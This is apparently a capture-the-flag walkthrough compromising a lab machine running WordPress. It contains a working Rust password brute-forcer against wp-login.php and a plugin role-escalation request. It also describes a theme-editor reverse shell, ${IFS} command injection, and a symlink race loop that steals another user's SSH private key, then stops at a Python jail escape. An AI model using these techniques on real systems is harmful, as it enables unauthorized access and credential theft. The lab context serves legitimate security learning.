So as we can see we have port 22,80 and we have manual directory let’s dig more and see what we have.
Inital Access
After some search i found a directory called wordpress. Which seems to contain the main website.
So after a log session of searching i found something intresting use wpscan.
Two users so we all know when you try to enter a password for a valid username in wordpress you will get a message say that the password is incorrect while the username is such this.
With that i decided to create simple script with rust to brute force the password.
use reqwest::{blocking::Client, cookie::Jar };
use std::{collections::HashMap, fs::File, io::{BufRead, BufReader}, sync::Arc};
use threadpool::ThreadPool;
fn test(client: Client, password: &str, target:&str){
// log=asd&pwd=asd&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.187.97%2Fwordpress%2Fwp-admin%2F&testcookie=
let mut params = HashMap::new();
params.insert("log", "admin");
params.insert("pwd", password);
params.insert("wp-submit", "Log in");
params.insert("redirect_to", "<http://10.10.187.97/wordpress/wp-admin/>");
// params.insert("testcookie", "1");
let res = client.post(target)
.form(¶ms)// This will send the data as application/x-www-form-urlencoded by default
.send()
.expect("Error while sendig the request");
let status = res.status();
let body = res.text().expect("Error while red the res");
// println!("{:#}", body);
if status.is_success() && !body.contains("incorrect."){
println!("Password Found : {password}");
}
}
fn main() {
let jar = Arc::new(Jar::default());
let thread = ThreadPool::new(30);
let file = File::open("/home/pythonic/Downloads/rockyou.txt").expect("Error while opening the file");
let target = "<http://10.10.187.97/wordpress/wp-login.php>";
let client = Client::builder()
.cookie_store(true) // Enable cookie storage
.cookie_provider(jar) // Set the jar for cookies
.build()
.expect("Error while building client");
let reader = BufReader::new(file);
for f in reader.lines(){
let client_clone = client.clone();
// let target_clone = target.clone();
thread.execute(move || {
if let Ok(password) = f {
test(client_clone, &password, target);
}
})
}
thread.join();
println!("Hello, world!");
}
Which state that the problem is that the WP Data Access plugin does not check for the athuorization of the user to change his role meaning any user with simple privilage can change his privilage to administrator.
So as you can see above in the burp image i added the wpda_role[]=administrator. which make us admins as you can see in the second image.
for now let’s have inital foot on the machine.
As for inital foot was easy just navigate to the tool → theme file editor. Then.
Choose the 404.php then paste you reverse shell then make sure to change the theme to edit am not sure why but i was having and issues with the original one. anyway that should be it.
And yeah.
John
After that i start enumerate the machine i found user called john which we have access to his directory. Than i saw this.
So john has a php server running on port 9999 so we need to find a way to make tunnling to see what is that server running. We can use tool called chisel.
This code will connect to port 8001 on our machine and will forward port 9999 from the target machine. To our machine on port 9999.
And we will see this page.
So after some testing i see that it delete the spaces by default.
So as you can see it trim all the spaces so we maybe able to do something if we find some trick to bypass this.
So there is a charecter called IFS. This in unix based system used to represent a space so if are able to inject this we maybe able to execute the command.
So as you can see we added to the command ${} which used for subsitute And we are able to execute the command.
With that we can easly now get a shell.
Simple revese shell will do. Now we just need to setup the python server.
So the final code will be something like this. Do not forget to setup a listener.
And here we are as john.
And this is our first flag. A long run.
Youcef
After that i decide to do an SSH key using. ssh-keygen.
ssh-keygen -f john
this command will are generate public and private keys for john.
just move the .pub key into .ssh/authorized_keys then copy the private key into your machine and change its permisions to 600 and you should be able to login via ssh. Which is much better.
Now we need to get the user yousef so when we access there we will see readfile code which we do not have access to the source code.
So we need to revese enginner it.
So to begin with we can see that there are a lof of checks.
As we can see the code contains race condition why??
First because each checks are sperated so it maybe possiable to pass some checks and read a file that does not met the conditions. So we maybe able to create a file to uses a symbolic link that refers to the id_rsa of the youcef user but still the permition of the symbolic link will be the same as the original file meaning we will not be able to read it. Do not forgot that the readfile have suid meaning it executed as youcef so if we somehow are able to create symbolic file and change it between symbolic and normal file to exploit the Race Condition.
while true; do ln -sf /home/youcef/.ssh/id_rsa key; rm key; touch key; done &
This code will create symbolic file that link to id_rsa and remove it and created again forever.
for i in {1..50}; do /home/youcef/./readfile key; done
Here where we exploit the Race Condition we using the readfile code to read the file content with youcef permition. And by doing that we will eventully see the key.
And after that we just crack it with john.
ssh2john key_j > hash
key_j is you file that contain the key.
Root
As for the final run to became root.
We can see that the current user has root access to jail.py so let’s see what it has.
So it a program that allow us to execute interactive python code. But it so restricted meaning we can not simple run anything.
So this could be simple we have a build in function in python called breakpoint().
